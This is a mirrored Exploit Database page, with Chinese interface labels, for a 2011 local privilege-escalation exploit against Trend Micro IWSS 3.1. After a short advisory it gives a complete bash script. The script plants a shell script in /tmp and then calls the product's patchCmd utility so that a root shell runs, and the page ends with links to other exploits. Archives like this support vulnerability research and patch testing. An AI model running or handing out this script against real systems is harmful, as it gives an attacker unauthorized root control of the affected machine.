Trend Micro IWSS 3.1 – Local Privilege Escalation

Exploit Database
17 阅读

作者： Buguroo Offensive Security

日期： 2011-10-26
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/36257/

source: https://www.securityfocus.com/bid/50380/info

Trendmicro IWSS is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with root privileges and completely compromise the affected computer.

Trendmicro IWSS 3.1 is vulnerable; other versions may also be affected. 

#!/bin/bash
# Copyright 2011 Buguroo Offensive Security - jrvilla.AT.buguroo.com

cd /tmp
echo "[*] Creating shell file"
echo -e "#!/bin/bash\n/bin/bash" > PatchExe.sh
echo "[*] Change permissions"
chmod 755 PatchExe.sh
echo "[*] Got r00t... Its free!"
/opt/trend/iwss/data/patch/bin/patchCmd u root

last Exploits
Trend Micro IWSS 3.1 – Local Privilege Escalation的更多信息

i-FTP 2.20 – Local Buffer Overflow (SEH)：
RadASM 2.2.1.6 – ‘.rap’ Universal Buffer Overflow：
QSEE – PRDiag* Commands Privilege Escalation：
Blueberry Express 5.9.0.3678 – Local Buffer Overflow (SEH)：
MalwareFox AntiMalware 2.74.0.150 – Privilege Escalation：
BlueStacks 2.5.55 – Unquoted Service Path Privilege Escalation：
HideMyAss Pro VPN Client for macOS 3.x – Local Privilege Escalation：
Mini-stream Ripper 2.7.7.100 – Local Buffer Overflow：